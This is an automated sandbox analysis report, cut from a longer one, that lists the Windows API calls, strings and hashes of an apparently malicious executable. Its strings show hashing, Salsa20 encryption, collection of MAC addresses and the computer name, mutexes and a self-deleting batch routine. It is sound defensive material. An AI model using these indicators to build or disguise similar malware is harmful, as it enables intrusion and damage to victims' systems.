                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                • __CxxThrowException@8.LIBCMT ref: 004110F0
                • _malloc.LIBCMT ref: 00411100
                • _memset.LIBCMT ref: 0041110B
                • _sprintf.LIBCMT ref: 0041112E
                • lstrcatA.KERNEL32(?,?), ref: 0041113C
                • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                • String ID: %.2X
                • API String ID: 2451520719-213608013
                • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                APIs
                • GetLastError.KERNEL32 ref: 00411915
                • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                • lstrcpyW.KERNEL32(00000000,?), ref: 00411962
                • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                • _memset.LIBCMT ref: 004119B8
                • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                  • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                • String ID: failed with error
                • API String ID: 4182478520-946485432
                • Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                • Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                APIs
                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                  • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
                • _memmove.LIBCMT ref: 0040F9EA
                • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                • _memmove.LIBCMT ref: 0040FADA
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                • String ID:
                • API String ID: 273148273-0
                • Opcode ID: daf740ff3ac2c3b591e036bdef447c77de08716d8619f20f92381a2c96999064
                • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
                • Opcode Fuzzy Hash: daf740ff3ac2c3b591e036bdef447c77de08716d8619f20f92381a2c96999064
                • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99
                APIs
                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                • __CxxThrowException@8.LIBCMT ref: 0040E90F
                • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                • __CxxThrowException@8.LIBCMT ref: 0040E93E
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                • __CxxThrowException@8.LIBCMT ref: 0040E96F
                • _memset.LIBCMT ref: 0040E98E
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                • _sprintf.LIBCMT ref: 0040E9D3
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                • String ID: %.2X
                • API String ID: 1084002244-213608013
                • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
                APIs
                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
                • __CxxThrowException@8.LIBCMT ref: 0040EB17
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                • __CxxThrowException@8.LIBCMT ref: 0040EB42
                • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
                • __CxxThrowException@8.LIBCMT ref: 0040EB64
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
                • __CxxThrowException@8.LIBCMT ref: 0040EB95
                • _memset.LIBCMT ref: 0040EBB4
                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                • _sprintf.LIBCMT ref: 0040EBF4
                • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                • String ID: %.2X
                • API String ID: 1637485200-213608013
                • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                APIs
                  • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                  • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                  • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                  • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                  • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                  • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                  • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                  • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                • SelectObject.GDI32(?,?), ref: 00482436
                • DeleteObject.GDI32(00000000), ref: 0048243D
                • DeleteDC.GDI32(?), ref: 0048244A
                • DeleteDC.GDI32(?), ref: 00482450
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                • String ID: .\crypto\rand\rand_win.c$DISPLAY
                • API String ID: 151064509-1805842116
                • Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
                • Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A
                APIs
                • _malloc.LIBCMT ref: 0040E67F
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: HeapAlloc.KERNEL32(005C0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                • _malloc.LIBCMT ref: 0040E68B
                • _wprintf.LIBCMT ref: 0040E69E
                • _free.LIBCMT ref: 0040E6A4
                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                • _free.LIBCMT ref: 0040E6C5
                • _malloc.LIBCMT ref: 0040E6CD
                • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                • _sprintf.LIBCMT ref: 0040E720
                • _wprintf.LIBCMT ref: 0040E732
                • _wprintf.LIBCMT ref: 0040E73C
                • _free.LIBCMT ref: 0040E745
                Strings
                • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                • Address: %s, mac: %s, xrefs: 0040E72D
                • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocErrorFreeLast_sprintf
                • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                • API String ID: 473631332-1604013687
                • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                APIs
                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                  • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
                • _memmove.LIBCMT ref: 00410427
                • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
                • _memmove.LIBCMT ref: 00410514
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                • String ID:
                • API String ID: 273148273-0
                • Opcode ID: 5d71b88130c3850f1ce6f9c9fc3c3b56fc5be04f011d63241bb511ce3f1a2a20
                • Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
                • Opcode Fuzzy Hash: 5d71b88130c3850f1ce6f9c9fc3c3b56fc5be04f011d63241bb511ce3f1a2a20
                • Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9
                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                • String ID:
                • API String ID: 3232302685-0
                • Opcode ID: 17126a02ccb6bbc5f32dfe245874f9dcbc49a53b6c6b99fc4e7ab7c0e104719e
                • Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
                • Opcode Fuzzy Hash: 17126a02ccb6bbc5f32dfe245874f9dcbc49a53b6c6b99fc4e7ab7c0e104719e
                • Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A
                APIs
                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: InfoLocale
                • String ID: ACP$OCP
                • API String ID: 2299586839-711371036
                • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                APIs
                Strings
                • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                • input != nullptr && output != nullptr, xrefs: 0040C095
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: __wassert
                • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                • API String ID: 3993402318-1975116136
                • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                APIs
                • CryptDestroyHash.ADVAPI32(?), ref: 00411190
                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004111A0
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$ContextDestroyHashRelease
                • String ID:
                • API String ID: 3989222877-0
                • Opcode ID: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                • Instruction ID: be51c898aa0ddf1eb2c7ddf255022cb250d4a78141f94ceb906d675081cd9b05
                • Opcode Fuzzy Hash: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                • Instruction Fuzzy Hash: F0E0EC74F40305A7EF50DBB6AC49FABB6A86B08745F444526FB04F3251D62CD841C528
                APIs
                • CryptDestroyHash.ADVAPI32(?), ref: 0040EA69
                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EA79
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$ContextDestroyHashRelease
                • String ID:
                • API String ID: 3989222877-0
                • Opcode ID: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                • Instruction ID: d41dd3a2d1aa4a110fdd7d588524fe859ae41a35967fa473e5fd9fc866ad400b
                • Opcode Fuzzy Hash: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                • Instruction Fuzzy Hash: B2E0EC78F002059BDF50DBB79C89F6B72A87B08744B440835F804F3285D63CD9118928
                APIs
                • CryptDestroyHash.ADVAPI32(?), ref: 0040EC80
                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EC90
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$ContextDestroyHashRelease
                • String ID:
                • API String ID: 3989222877-0
                • Opcode ID: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                • Instruction ID: 275dd0b1ae59d7aa5d1c23d1b64c6eee76a350be21334d4cde6f8a02617c5264
                • Opcode Fuzzy Hash: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                • Instruction Fuzzy Hash: 97E0BDB4F0420597EF60DEB69E49F6B76A8AB04645B440835E904F2281DA3DD8218A29
                APIs
                • GetProcessHeap.KERNEL32(00423FED,00507990,00000014), ref: 004278D5
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: HeapProcess
                • String ID:
                • API String ID: 54951025-0
                • Opcode ID: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
                • Instruction ID: c175dc67e46cb5b18e7b8d473ad54adbb7c8ff58e9170129aa5670ed77b5f39c
                • Opcode Fuzzy Hash: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
                • Instruction Fuzzy Hash: 79B012F0705102474B480B387C9804935D47708305300407DF00BC11A0EF70C860BA08
                APIs
                • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                • GetLastError.KERNEL32 ref: 00412509
                • CloseHandle.KERNEL32 ref: 0041251C
                • CloseHandle.KERNEL32 ref: 00412539
                • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                • GetLastError.KERNEL32 ref: 0041255B
                • CloseHandle.KERNEL32 ref: 0041256E
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle$CreateErrorLastMutex
                • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                • API String ID: 2372642624-488272950
                • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _strncmp
                • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                • API String ID: 909875538-2733969777
                • Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                • Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                • String ID:
                • API String ID: 1503006713-0
                • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                APIs
                • PostQuitMessage.USER32(00000000), ref: 0041BB49
                • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                • _malloc.LIBCMT ref: 0041BBE4
                • GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
